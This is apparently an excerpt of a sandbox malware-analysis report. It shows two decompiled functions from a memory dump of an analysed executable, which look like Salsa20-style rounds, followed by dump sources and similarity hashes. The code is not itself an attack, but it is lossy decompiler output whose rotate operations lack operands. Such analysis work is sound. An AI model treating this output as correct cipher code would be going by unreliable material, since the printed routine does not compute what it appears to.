				_t78 = __ecx[9];
				asm("rol eax, 0x9");
				__ecx[0xd] = __ecx[0xd] ^ _t78 + _t86;
				_t82 = __ecx[0xd];
				asm("rol eax, 0xd");
				_t60 = _t82 + _t78 ^ _t90;
				_t91 = __ecx[6];
				__ecx[1] = _t60;
				asm("ror eax, 0xe");
				_t87 = __ecx[0xa];
				__ecx[5] = _t60 + _t82 ^ _t86;
				asm("rol eax, 0x7");
				__ecx[0xe] = __ecx[0xe] ^ _t87 + _t91;
				_t79 = __ecx[0xe];
				asm("rol eax, 0x9");
				__ecx[2] = __ecx[2] ^ _t79 + _t87;
				_t83 = __ecx[2];
				asm("rol eax, 0xd");
				_t66 = _t83 + _t79 ^ _t91;
				_t92 = __ecx[0xb];
				__ecx[6] = _t66;
				asm("ror eax, 0xe");
				_t88 = __ecx[0xf];
				__ecx[0xa] = _t66 + _t83 ^ _t87;
				asm("rol eax, 0x7");
				__ecx[3] = __ecx[3] ^ _t88 + _t92;
				_t80 = __ecx[3];
				asm("rol eax, 0x9");
				__ecx[7] = __ecx[7] ^ _t80 + _t88;
				_t84 = __ecx[7];
				asm("rol eax, 0xd");
				_t72 = _t84 + _t80 ^ _t92;
				__ecx[0xb] = _t72;
				asm("ror eax, 0xe");
				_t74 = _t72 + _t84 ^ _t88;
				__ecx[0xf] = _t74;
				return _t74;
			}

Memory Dump Source
  • Source File: 00000000.00000002.224986040.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.224981936.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.224990586.0000000000404000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_pss.jbxd
Similarity
  • API ID:
  • String ID:
  • API String ID:
  • Opcode ID: e3b106e1137a2f6526024d9419026bcc8076fc67c436758deb0114605f6d57e3
  • Instruction ID: 5f9c2fa85bd04c7279ec7dc59c17b89f204f91a6b12579afeed664e27c2dd38a
  • Opcode Fuzzy Hash: e3b106e1137a2f6526024d9419026bcc8076fc67c436758deb0114605f6d57e3
  • Instruction Fuzzy Hash: C431C9B5510206CFCF84DF29C8C5882B7E9FB8825476595AACC05CF21AE374EA5ACFD0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 62%
			E004036A0(signed int* __ecx) {
				signed int _t54;
				signed int _t60;
				signed int _t66;
				signed int _t72;
				signed int _t74;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t90;
				signed int _t91;
				signed int _t92;

				_t85 =  *__ecx;
				_t89 = __ecx[3];
				asm("rol eax, 0x7");
				__ecx[1] = __ecx[1] ^ _t85 + _t89;
				_t77 = __ecx[1];
				asm("rol eax, 0x9");
				__ecx[2] = __ecx[2] ^ _t77 + _t85;
				_t81 = __ecx[2];
				asm("rol eax, 0xd");
				_t54 = _t81 + _t77 ^ _t89;
				_t90 = __ecx[4];
				__ecx[3] = _t54;
				asm("ror eax, 0xe");
				_t86 = __ecx[5];
				 *__ecx = _t54 + _t81 ^ _t85;
				asm("rol eax, 0x7");
				__ecx[6] = __ecx[6] ^ _t86 + _t90;
				_t78 = __ecx[6];
				asm("rol eax, 0x9");
				__ecx[7] = __ecx[7] ^ _t78 + _t86;
				_t82 = __ecx[7];
				asm("rol eax, 0xd");
				_t60 = _t82 + _t78 ^ _t90;
				_t91 = __ecx[9];
				__ecx[4] = _t60;
				asm("ror eax, 0xe");
				_t87 = __ecx[0xa];
				__ecx[5] = _t60 + _t82 ^ _t86;
				asm("rol eax, 0x7");
				__ecx[0xb] = __ecx[0xb] ^ _t87 + _t91;
				_t79 = __ecx[0xb];
				asm("rol eax, 0x9");
				__ecx[8] = __ecx[8] ^ _t79 + _t87;
				_t83 = __ecx[8];
				asm("rol eax, 0xd");
				_t66 = _t83 + _t79 ^ _t91;
				_t92 = __ecx[0xe];
				__ecx[9] = _t66;
				asm("ror eax, 0xe");
				_t88 = __ecx[0xf];
				__ecx[0xa] = _t66 + _t83 ^ _t87;
				asm("rol eax, 0x7");
				__ecx[0xc] = __ecx[0xc] ^ _t88 + _t92;
				_t80 = __ecx[0xc];
				asm("rol eax, 0x9");
				__ecx[0xd] = __ecx[0xd] ^ _t80 + _t88;
				_t84 = __ecx[0xd];
				asm("rol eax, 0xd");
				_t72 = _t84 + _t80 ^ _t92;
				__ecx[0xe] = _t72;
				asm("ror eax, 0xe");
				_t74 = _t72 + _t84 ^ _t88;
				__ecx[0xf] = _t74;
				return _t74;
			}

Memory Dump Source
  • Source File: 00000000.00000002.224986040.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.224981936.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.224990586.0000000000404000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_pss.jbxd
Similarity
  • API ID:
  • String ID:
  • API String ID:
  • Opcode ID: fe908915731aae9e7002019e2ae205669ce4d0858ed82aba9b0a752a773b5fb5
  • Instruction ID: d5bb8ea4cda88cb471418a764478014c9aedac2b4edce145b518b2bf5724addd
  • Opcode Fuzzy Hash: fe908915731aae9e7002019e2ae205669ce4d0858ed82aba9b0a752a773b5fb5
  • Instruction Fuzzy Hash: 0731C9B5510206CFCF84DF29C8C588277E9FB8825476595AACC05CF21AE374EA5ACFD0
Uniqueness

Uniqueness Score: -1.00%